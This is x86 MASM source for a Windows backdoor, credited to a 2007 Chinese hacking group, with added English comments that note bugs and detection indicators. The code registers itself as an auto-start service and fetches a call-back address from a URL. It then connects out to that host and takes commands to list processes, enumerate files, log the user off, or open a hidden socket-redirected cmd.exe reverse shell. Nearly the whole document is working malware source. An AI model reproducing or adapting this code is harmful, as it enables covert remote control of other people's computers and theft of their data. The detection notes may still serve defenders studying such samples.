;******************************************************
;程序编写by Asm
;日期:2007-4-10日
;出处:http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
include macros.inc
.data
; Status strings sent back over the control socket around the log-off command
; (Chinese text; part of the wire protocol, left untouched).
szExit db "远程主机正在响应命令.........",13,10,0
szExit1 db "命令已经成功执行........",13,10,0
; Receive buffer for commands. _Main issues recv() with exactly 1024 bytes, so a
; full-size message leaves no terminating NUL inside the buffer (the NUL at the
; end of `buff` below is what would stop lstrlen in that case).
lpBuffer db 1024 dup(0)
buff db "%s",13,10,0 ;wsprintf format used by _Process: one string plus CRLF
; URL fetched by _ReadInternet to obtain the address this program connects back to.
; Left as a placeholder ("http:// ", note the trailing space) in this copy.
szUrl db 'http:// ',0
.data?
buff1 db 1025 dup(?) ;formatted process-name line (_Process)
szIP db 1025 dup(?) ;raw HTTP response body; handed straight to inet_addr
szSerice db 1024 dup(?) ;formatted memory-status lines (_GetMoudel)
server SOCKET ? ;control socket shared by every routine that sends
client SOCKET ? ;declared but not referenced in this file
hWinMain dd ? ;declared but not referenced in this file
stProcess PROCESSENTRY32<?> ;current entry of the Toolhelp process snapshot
hSnapShot dd ? ;Toolhelp snapshot handle; never closed anywhere in this file
closepid dd ? ;PID of the last enumerated process; written in _Process, never read
Pid dd ? ;declared but not referenced in this file
dwFolderCount dd ? ;incremented per sub-directory in _FindFile, never read
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; BOOL _EnablePrivilege(LPCSTR szPriv, BOOL bFlags)
; ABI:   stdcall (.model flat,stdcall)
; In:    szPriv = privilege name string (start passes "SeDebugPrivilege")
;        bFlags = nonzero -> enable the privilege, zero -> disable it
; Out:   eax = return value of AdjustTokenPrivileges
; Note:  the results of OpenProcessToken and LookupPrivilegeValue are not
;        checked; on failure hToken / tkp keep whatever the frame held.
;-----------------------------------------------------------------------
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
LOCAL hToken
LOCAL tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess ;pseudo-handle of the current process
mov edx, eax
invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken ;open our own access token
invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid;LUID of the named privilege
mov tkp.PrivilegeCount, 1
xor eax, eax
.if bFlags
mov eax, SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax ;SE_PRIVILEGE_ENABLED or 0
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 ;apply the change to the token
push eax ;keep AdjustTokenPrivileges' result across CloseHandle
invoke CloseHandle, hToken
pop eax
ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _ReadInternet(void)
; Fetches the body of szUrl over HTTP (WinINet) into szIP. _Main and _Cmd
; pass szIP directly to inet_addr, so the response is expected to be a
; dotted-quad address: this is how the program learns where to connect back.
; In:    none (reads szUrl)
; Out:   szIP overwritten; no return value (pushad/popad restore all registers)
; Note:  @hSession and @hHttpFile are assigned only when the respective open
;        succeeded; on failure the uninitialised local is still passed on to the
;        next call. The user-agent string "ReadFile" and the fetch of szUrl are
;        the network observables of this routine.
;-----------------------------------------------------------------------
_ReadInternet proc
local @hSession,@hHttpFile,@dwRead ;session handle, URL handle, bytes read
pushad ;save all general registers
invoke RtlZeroMemory,addr szIP,sizeof szIP
invoke InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,\
NULL,NULL,0 ;open a WinINet session
.if eax ;nonzero = success
mov @hSession,eax ;keep the session handle
.endif
invoke InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
.if eax
mov @hHttpFile,eax
.endif
invoke InternetReadFile,@hHttpFile,addr szIP,sizeof szIP,addr @dwRead;read the response body into szIP
invoke InternetCloseHandle,@hHttpFile;release the URL handle
invoke InternetCloseHandle,@hSession
popad ;restore registers
ret
_ReadInternet endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>..
;-----------------------------------------------------------------------
; void _Process(void)
; Enumerates running processes with Toolhelp and sends each exe name,
; CRLF-terminated, over the control socket `server`, sleeping 1 s per entry.
; In:    none (uses globals stProcess, hSnapShot, buff1, buff, server)
; Out:   closepid = PID of the last entry enumerated (not read anywhere else);
;        eax = last Process32First/Next result
; Note:  hSnapShot is never passed to CloseHandle in this file, so every call
;        leaks one snapshot handle.
;-----------------------------------------------------------------------
_Process proc
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;clear the entry
mov stProcess.dwSize,sizeof stProcess
; NOTE(review): the second argument of CreateToolhelp32Snapshot is a process id
; (ignored for TH32CS_SNAPPROCESS); passing `addr stProcess` looks like a slip
; and is presumably harmless here.
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax ;until Process32First/Next returns FALSE
invoke RtlZeroMemory,addr buff1,sizeof buff1
invoke wsprintf,addr buff1,addr buff,addr stProcess.szExeFile ;buff1 = "<exe name>\r\n"
invoke lstrlen,addr buff1
invoke send,server,addr buff1,eax,0
push stProcess.th32ProcessID
pop closepid ;closepid = this entry's PID
invoke Sleep,1000;pace the output so the remote side gets one line at a time
invoke Process32Next,hSnapShot,addr stProcess
.endw
ret
_Process endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里设置的shell反弹端口要和NC监听的一样
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _Cmd(void)
; Opens a second TCP connection to the address in szIP on port 8888 and
; launches "cmd" with stdin/stdout/stderr all redirected to that socket,
; i.e. an interactive shell for the remote side; then closes the socket.
; In:    none (reads szIP)
; Out:   none meaningful (eax = closesocket result). ebx is overwritten and
;        not restored, although it is callee-saved under stdcall; the mutex
;        handle that `start` keeps in ebx is lost (it is never used afterwards).
; Notes: the connect result is not checked, so cmd is spawned even when the
;        connection failed. WaitForSingleObject receives `addr stProcInfo.hProcess`
;        (the address of the handle) rather than the handle, so the wait
;        presumably fails at once and the socket is closed immediately.
; Detection: a hidden cmd.exe whose inherited std handles are a socket,
;        spawned by a service process, is the host-side observable here.
;-----------------------------------------------------------------------
_Cmd proc
local @wsaData:WSADATA
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local hSocket
invoke WSAStartup,202h,addr @wsaData ;Winsock 2.2 (already initialised once by _Main)
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;plain TCP socket, no overlapped flag
mov hSocket,eax ;keep the socket handle
mov @stAddr.sin_family,AF_INET ;IPv4
invoke htons,8888 ;port 8888 in network byte order (the port the remote listener uses)
mov @stAddr.sin_port,ax ;store
invoke inet_addr,addr szIP;address fetched by _ReadInternet
mov @stAddr.sin_addr,eax
invoke connect,hSocket,addr @stAddr,sizeof @stAddr;connect out; result ignored
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke GetStartupInfo,addr stStartUp
mov ebx,hSocket ;socket handle into ebx (not saved/restored)
mov stStartUp.hStdInput,ebx ;all three std handles point at the socket
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h ;STARTF_USESTDHANDLES (100h) or STARTF_USESHOWWINDOW (1)
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo ;bInheritHandles = 1 so cmd inherits the socket
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; intended to block until cmd exits (see note in header)
invoke closesocket,hSocket
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _CreateSerice(void)
; Persistence: (re)registers this executable as an auto-start, interactive
; service named "GetSysService" (display name "GetSysForShellexecute") and
; starts it. Any existing service of that name is deleted first. Called
; unconditionally at the top of _Main.
; In:    none (uses its own module path from GetModuleFileName)
; Out:   none meaningful; eax = last CloseServiceHandle result, or 0 when
;        OpenSCManager failed (the function then does nothing)
; Notes: OpenSCManager requests SC_MANAGER_CREATE_SERVICE, which needs an
;        administrative token. This file contains no StartServiceCtrlDispatcher
;        or ServiceMain, so the instance launched by the SCM presumably runs
;        `start` like a normal exe and the SCM reports a start failure.
; Detection: service installation with an ImagePath pointing at this binary
;        (e.g. System log event 7045) and the service/display names above.
;-----------------------------------------------------------------------
_CreateSerice proc
LOCAL hSCManager
LOCAL hService
LOCAL szBuff[MAX_PATH] :byte
LOCAL ServiceStatus:SERVICE_STATUS ;declared but not used in this proc
invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE ;connect to the local SCM
.if eax!=0
mov hSCManager, eax ;connected; keep the SCM handle
invoke OpenService, hSCManager,CTXT("GetSysService"), DELETE ;look for an existing service of that name
.if eax!=0 ;nonzero = the service exists and was opened (the original comment said "open failed")
push eax ;pushed now as the argument for the `call CloseServiceHandle` below
invoke DeleteService, eax
call CloseServiceHandle ;consumes the handle pushed above (stdcall)
.endif
invoke GetModuleFileName,NULL,addr szBuff,200 ;own path; limited to 200 bytes although szBuff holds MAX_PATH
invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),\ ;register the service
SERVICE_START + SERVICE_QUERY_STATUS + DELETE, \
SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, \
SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
.if eax!=0
mov hService, eax
invoke StartService, hService, 0, NULL;start it immediately
invoke CloseServiceHandle, hService
.endif
invoke CloseServiceHandle, hSCManager
.endif
ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _FindFile(LPSTR _lpszPath)
; Recursively walks the directory tree under _lpszPath and sends the full
; path of every file found over the control socket `server`, one send() per
; file with no separator appended, sleeping 50 ms after each entry.
; In:    _lpszPath = directory to walk (in _Main this is the raw received text)
; Out:   none (pushad/popad restore all registers); dwFolderCount is
;        incremented per sub-directory but never read
; Notes: an entry whose name starts with '.' is skipped, which covers "." and
;        ".." but also any other dot-prefixed directory. Each recursion level
;        keeps roughly 2 KB of locals on the stack and there is no depth limit.
;        With an empty _lpszPath the `[ebx-1]` test below reads the byte just
;        before @szPath in the frame. lstrcat into @szFindFile has no length check.
;-----------------------------------------------------------------------
_FindFile proc _lpszPath
local @stFindFile:WIN32_FIND_DATA
local @hFindFile
local @szPath[MAX_PATH]:byte ;holds "path\"
local @szSearch[MAX_PATH]:byte ;holds "path\*.*"
local @szFindFile[1025]:byte ;holds "path\<found entry>"
local hWnd ;declared but not used
pushad
invoke RtlZeroMemory,addr @szPath,sizeof @szPath
invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
invoke lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; Append "\*.*" to the path
;********************************************************************
@@: ;anonymous label; nothing in this proc jumps to it
invoke lstrlen,addr @szPath
lea ebx,@szPath
add ebx,eax ;ebx -> terminating NUL of @szPath
xor eax,eax
mov al,'\' ;ax = 005Ch: '\' followed by a NUL
.if byte ptr [ebx-1] != al ;append '\' only if the path does not already end with one
mov word ptr [ebx],ax
.endif
invoke lstrcpy,addr @szSearch,addr @szPath
invoke lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; Enumerate the directory
;********************************************************************
invoke FindFirstFile,addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
invoke lstrcpy,addr @szFindFile,addr @szPath
invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName ;@szFindFile = "path\" + entry name
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ;is this entry a directory?
.if @stFindFile.cFileName != '.' ;first byte only: skips ".", ".." and any dot-prefixed name
inc dwFolderCount
invoke _FindFile,addr @szFindFile;recurse into the sub-directory
.endif
.else
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0 ;send the file path
.endif
invoke Sleep,50;pace the output for the remote side
invoke FindNextFile,@hFindFile,addr @stFindFile
.until eax == FALSE
invoke FindClose,@hFindFile
.endif
popad
ret
_FindFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _send(LPCSTR _serices)
; Sends the NUL-terminated string _serices over the control socket `server`
; and pauses 50 ms so consecutive lines arrive separately.
; In:    _serices = string to send (no newline is appended)
; Out:   eax = whatever Sleep leaves behind; send() errors are not checked
;-----------------------------------------------------------------------
_send proc _serices
invoke lstrlen,_serices
invoke send,server,_serices,eax,0
invoke Sleep,50
ret
_send endp
;**********************************************************************
;-----------------------------------------------------------------------
; void _GetMoudel(void)
; Reports memory statistics (GlobalMemoryStatus) to the remote side: seven
; formatted lines via _send plus one separator line sent directly.
; In:    none
; Out:   szSerice zeroed on return; eax = RtlZeroMemory result
; Note:  the line labelled "CPU使用率" (CPU usage) is formatted from
;        dwMemoryLoad, which per the MEMORYSTATUS documentation is the
;        percentage of memory in use, not CPU load. The format strings are
;        part of the wire protocol and are left byte-for-byte as found.
;-----------------------------------------------------------------------
_GetMoudel proc
local stMemInfo:MEMORYSTATUS
invoke RtlZeroMemory,addr stMemInfo,sizeof stMemInfo
mov stMemInfo.dwLength,sizeof stMemInfo ;dwLength must be set before the call
invoke GlobalMemoryStatus,addr stMemInfo
invoke wsprintf,addr szSerice,CTXT("物理内存总数 %lu 字节"),stMemInfo.dwTotalPhys ;total physical memory, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("空闲物理内存 %lu 字节"),stMemInfo.dwAvailPhys ;free physical memory, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("虚拟内存总数 %lu 字节"),stMemInfo.dwTotalPageFile ;total page file, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("空闲虚拟内存 %lu 字节"),stMemInfo.dwAvailPageFile ;free page file, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("CPU使用率 %d%%"),stMemInfo.dwMemoryLoad ;labelled "CPU usage" but carries dwMemoryLoad
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke lstrlen,CTXT("————————————————")
invoke send,server,CTXT("————————————————"),eax,0 ;separator line, sent without the 50 ms pause
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("用户地址空间总数 %lu 字节"),stMemInfo.dwTotalVirtual ;total user address space, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("用户可用地址空间 %lu 字节"),stMemInfo.dwAvailVirtual ;free user address space, bytes
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
ret
_GetMoudel endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _CmdLineToShell(LPSTR _FileName)
; Dispatches a one-character command from the remote side. The command byte
; is read from the global lpBuffer, not from the _FileName argument, which
; is unused. Commands:
;   'l' - send the process list (_Process)
;   'e' - send memory statistics (_GetMoudel)
;   'o' - send szExit, log the interactive user off, then send szExit1
;   'c' - spawn the socket-redirected "cmd" shell (_Cmd)
; Any other byte is ignored.
; In:    _FileName = unused; lpBuffer[0] = command byte
; Out:   none meaningful; eax is whatever the last call left
; Note:  ExitWindowsEx presumably returns once the log-off is initiated, so
;        szExit1 ("command executed successfully") is sent regardless of outcome.
;-----------------------------------------------------------------------
_CmdLineToShell proc _FileName
.if lpBuffer=='l' ;compares only the first byte of lpBuffer
invoke _Process;list processes and send them to the remote side
.elseif lpBuffer=='e'
invoke _GetMoudel
.elseif lpBuffer=='o'
invoke lstrlen,addr szExit
invoke send,server,addr szExit,eax,0 ;"remote host is responding to the command"
invoke ExitWindowsEx,EWX_LOGOFF,0 ;log off the current user
invoke lstrlen,addr szExit1
invoke send,server,addr szExit1,eax,0 ;"command executed successfully"
.elseif lpBuffer=='c'
call _Cmd ;no arguments, so a plain call is equivalent to invoke here
.endif
ret
_CmdLineToShell endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; BOOL _Main(void)
; Control loop. Installs the service (_CreateSerice), fetches the call-back
; address (_ReadInternet), connects to it on TCP port 1028 and then loops:
; receive a message into lpBuffer, dispatch it, until recv returns SOCKET_ERROR.
; Out:   eax = FALSE if socket() failed (returns before connecting), else TRUE
; Notes: the connect result is not acted on (the .if on SOCKET_ERROR is empty).
;        recv returning 0 (peer closed) is not SOCKET_ERROR, so the loop keeps
;        spinning on an empty buffer in that case. The dispatch condition
;        `(eax>=3)||(eax<=44)` holds for every length, so any message whose
;        length is not exactly 1 - including an empty one - is handed to
;        _FindFile as a directory path.
; Detection: an HTTP fetch of szUrl followed by an outbound TCP/1028
;        connection from the same (service) process.
;-----------------------------------------------------------------------
_Main proc
local @stData:WSADATA
local @temp:SOCKET ;declared but not used
local @stAddr:sockaddr_in
local @dwRecv,ThreadId4 ;ThreadId4 is not used
call _CreateSerice ;install/start the auto-start service
invoke WSAStartup,202H,addr @stData ;Winsock 2.2
invoke RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
mov @stAddr.sin_family,AF_INET
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;The port used here is the one the remote side must be listening on
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke htons,1028 ;control-channel port
mov @stAddr.sin_port,ax
call _ReadInternet ;szIP = body fetched from szUrl
invoke inet_addr,addr szIP
mov @stAddr.sin_addr,eax ;inet_addr's INADDR_NONE on malformed input is not checked
invoke socket,AF_INET,SOCK_STREAM,0
.if eax==INVALID_SOCKET
mov eax,FALSE
ret ;MASM emits the frame epilogue before this ret
.endif
mov server,eax ;global control socket used by every sender
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax==SOCKET_ERROR ;failure is ignored; the loop below then runs on an unconnected socket
.endif
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;Command loop: process messages from the remote side
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke recv,server,addr lpBuffer,1024,0 ;may fill the whole buffer; no room is kept for a NUL
mov @dwRecv,eax
invoke lstrlen,addr lpBuffer
.if eax==1 ;single byte = command letter
invoke _CmdLineToShell,addr lpBuffer
.elseif (eax>=3)||(eax<=44);true for every other length (see header): treat the text as a path to list
invoke _FindFile,addr lpBuffer
.endif
.break .if @dwRecv==SOCKET_ERROR ;checked only after the message has been processed
.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.if server!=INVALID_SOCKET
invoke closesocket,server
.endif
invoke WSACleanup
mov eax,TRUE
ret
_Main endp
;-----------------------------------------------------------------------
; Entry point. Shows a Yes/No MessageBox ("Really run the remote-control
; server program?") and, unless No is chosen, enables SeDebugPrivilege,
; creates the mutex "GetSys1_Mutex" as a single-instance guard and runs
; _Main repeatedly. If the mutex already existed (GetLastError == 0B7h,
; ERROR_ALREADY_EXISTS) the process exits.
; Notes: the test is `!= IDNO`, so any result other than IDNO runs the code.
;        The retry loop is `Loop @B`, which decrements ecx and repeats while it
;        is nonzero; ecx is never set here, so the repetition count depends on
;        whatever ecx holds when _Main returns. The `.elseif` on the failure
;        branch carries no condition; control reaches `close` either way.
;-----------------------------------------------------------------------
start:
invoke MessageBox,NULL,CTXT("真的要执行远控服务端程序吗?"),CTXT("提示"),MB_YESNO or MB_ICONINFORMATION ;"Really run the remote-control server program?" / "Notice"
.if eax!=IDNO
invoke _EnablePrivilege,CTXT("SeDebugPrivilege"), TRUE ;enable SeDebugPrivilege on our own token
invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex") ;single-instance mutex (host-based indicator)
mov ebx,eax ;mutex handle kept in ebx; never used again, and _Cmd overwrites ebx
invoke GetLastError
.if eax!=0B7h ;0B7h = ERROR_ALREADY_EXISTS: another instance owns the mutex
@@:
invoke _Main
Loop @B ;repeat while --ecx != 0 (ecx is uninitialised here)
.elseif ;no condition given; see note in header
jmp close
.endif
.endif
close:
invoke ExitProcess,0
end start